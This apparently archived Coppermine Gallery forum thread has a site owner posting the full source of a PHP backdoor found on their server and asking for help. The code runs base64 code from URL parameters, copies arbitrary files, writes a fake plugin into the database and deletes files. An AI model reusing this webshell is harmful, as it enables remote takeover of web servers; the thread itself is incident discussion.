Mystery php file Mystery php file
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Mystery php file

Started by Tezcatlipoca, February 07, 2009, 07:35:34 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Tezcatlipoca

I've just updated my cpg installation to 1.4.20, from 1.4.19, and noticed a .php file within /albums which I don't think I've noticed before.

The file name was "27e14dcb8d43e52d62e233484438643b.php", & the contents are quoted below.

It was dated 4th Feb. 2009.


To upgrade, I've since deleted *everything* from my cpg folder except my own album folders within /albums before then uploading 1.4.20 (I also checked my own album folders, & they only contain my jpegs).


Is this file I noticed normal?

<?
$hash="27e14dcb8d43e52d62e233484438643b";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="27e14dcb8d43e52d62e233484438643b";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("27e14dcb8d43e52d62e233484438643b", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>


ullielfan

That's what I want to know too. I run several fansites and most of them have these strange files. ???

Hein Traag

Both of you read this thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

@ulliefan. Never hijack a other users thread, even if your problem is exactly the same.

Tezcatlipoca

Quote from: Hein Traag on February 08, 2009, 07:14:45 PM
Both of you read this thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

@ulliefan. Never hijack a other users thread, even if your problem is exactly the same.


Thanks for the reply, Hein Traag :)

I've had a read through that. I'm not sure what else I can/should do though, as I have already deleted my cpg install (except the albums) & uploaded & upgraded to version 1.4.20.


Tezcatlipoca

My paranoia has since caused me to wipe pretty much everything & start over.

I have deleted the mysql database & user for my cpg installation, along with the entire cpg folder itself on my webspace.

I also deleted my installation of Wordpress 2.7 (latest version).

I uploaded a fresh copy of cpg1.4.20 along with a fresh copy of Wordpress 2.7, created a new mysql databse & user for cpg (with different names & password to the previous cpg DB & DB user), & then installed cpg from scratch.

I also had a look around my site, & the area above public_html, with FileZilla, to see if I could notice anything else.

Plus I changed all my passwords... cPanel/FTP, cpg, Wordpress, etc. And then changed them again. And again.


I just wish my initial panic hadn't caused me to delete everything in my cpg installation (bar my own albums) initially, as I don't know if there was anything else present as well as the strange php file mentioned in the first post (I think there was a "main.index.php" or something too, within /albums, which seeing a fresh install I now realise is prob. not something that should have been there).


Is there anything else I can do?


Is there anyone who can have a look at the php file I have quoted in the first post, & explain just what it would have been doing? [it makes no sense to me].


:)

Tezcatlipoca

I've just used WinMerge to compare the cpg database backup I made on Saturday (pre-wipe & fresh install with a new DB etc.) to the one I made in October.

There were a few minor differences, which to my untrained eye did not look important, however I did notice this at line 381 of the newer DB:

INSERT INTO `cpg1411_plugins` (`plugin_id`, `name`, `path`, `priority`) VALUES (1,'Sumple Plugin','/../../../../../../../../../../../../../home/<my webspace username>/public_html/<my cpg installation>/albums/userpics',0);


... which I recognise from my "Mystery php file".

So, although I know nothing about php or sql, it does look like this php file did access cpg's mysql database and inserted a reference to a "Sumple Plugin" apparently located within /albums/userpics.

Pity I wiped the lot when I did & didn't have a deeper look around first - would very much have liked to see just what this "plugin" was, if the file was actually there.


As I have never actually had plugins enabled on my cpg installation, would this "Sumple Plugin" have been able to do anything?
I suppose with malicious DB access plugins could actually have been enabled without me knowing though - how could I check that from my DB backup?


Also, just *how* would this breach have occurred in the first place?

Via the exploit in 1.4.19 which 1.4.20 patched?

Via permissions?


I did have /include, /albums, /albums/userpics and /albums/edit all set to 777, along with my own album folders within /albums - as that's what the documentation says, plus cpg actually refuses to install at all if they have their permissions set to anything other than 777.


However, on looking elsewhere since this happened, it sounds like having any folders set to 777 is actually a rather bad thing to have???!!!

When I reinstalled from fresh last night, I decided to have them set to 777 only temporarily:

- Once the installation was finished, I changed /include back to 755, as I don't see why any write permissions would still be needed once the config.inc.php file has been created.

- Once the installation was finished, I changed /albums/edit and /albums/userpics back to 755, as I have no users other than myself, and I only upload via FTP.

- Once I had used the cpg web admin interface to batch add my uploaded photos to Albums, I changed all my own album folders within /albums back to 755, as surely write permissions are no longer needed once the thumbnails & intermediate pictures have been created.


Tezcatlipoca

Sorry, don't seem to be able to edit:

Just to point out that the "code" block is rather long, & scrolls past the width of the screen - more there than there appears at a glance.

Tezcatlipoca

Quote from: Tezcatlipoca on February 09, 2009, 11:44:20 PM
- Once I had used the cpg web admin interface to batch add my uploaded photos to Albums, I changed all my own album folders within /albums back to 755, as surely write permissions are no longer needed once the thumbnails & intermediate pictures have been created.

... oh, & changed /albums itself back to 755 too.

Tezcatlipoca

Does no-one have any help or advice based on what I have posted so far? :(

Hein Traag

look if you want to completely get rid of your paranoia then completely delete the whole cpg. Reupload and install a new one. Re-add the pictures anew to the correct albums etc and in the future check this site more often to keep up with new versions. Cpg1.5 is equiped with a method to alert admins of new versions but until it is released that is up to you to keep an eye on.

Ludo

Quote from: Tezcatlipoca on February 09, 2009, 11:44:20 PMwould this "Sumple Plugin" have been able to do anything?
It seems it could have deleted all the /albums/userpics/ directory content.  :o

Quoteit sounds like having any folders set to 777 is actually a rather bad thing to have???!!!
I have them set to 755 since I opened my gallery without any inconvenience.

Tezcatlipoca

Quote from: Hein Traag on February 12, 2009, 08:08:07 AM
look if you want to completely get rid of your paranoia then completely delete the whole cpg. Reupload and install a new one. Re-add the pictures anew to the correct albums etc and in the future check this site more often to keep up with new versions. Cpg1.5 is equiped with a method to alert admins of new versions but until it is released that is up to you to keep an eye on.

Thanks :) I've already done all that though.

I'm just concerned as to...

- What the consequences of this would have been or could have been. Is there still anything to worry about?

- How this actually happened.

- Whether it could it have spread further than cpg.


The funny thing is that I checked this site just a few days before 1.4.20 was announced, saw it was still on 1.4.19 & went away...only to find when I checked again a week later that a) 1.4.20 had now been out a few days and b) somehow my site had already been hacked :(


Quote from: Ludo on February 12, 2009, 09:56:11 AM
It seems it could have deleted all the /albums/userpics/ directory content.  :o


Thanks for having a look :)

If that is all that it would have done, then tbh it's a relief as I didn't have any content within /albums/userpics anyway.

Quote from: Ludo on February 12, 2009, 09:56:11 AMI have them set to 755 since I opened my gallery without any inconvenience.

Cool. I'll keep mine on 755 - I don't want to leave any possible holes for it to happen again.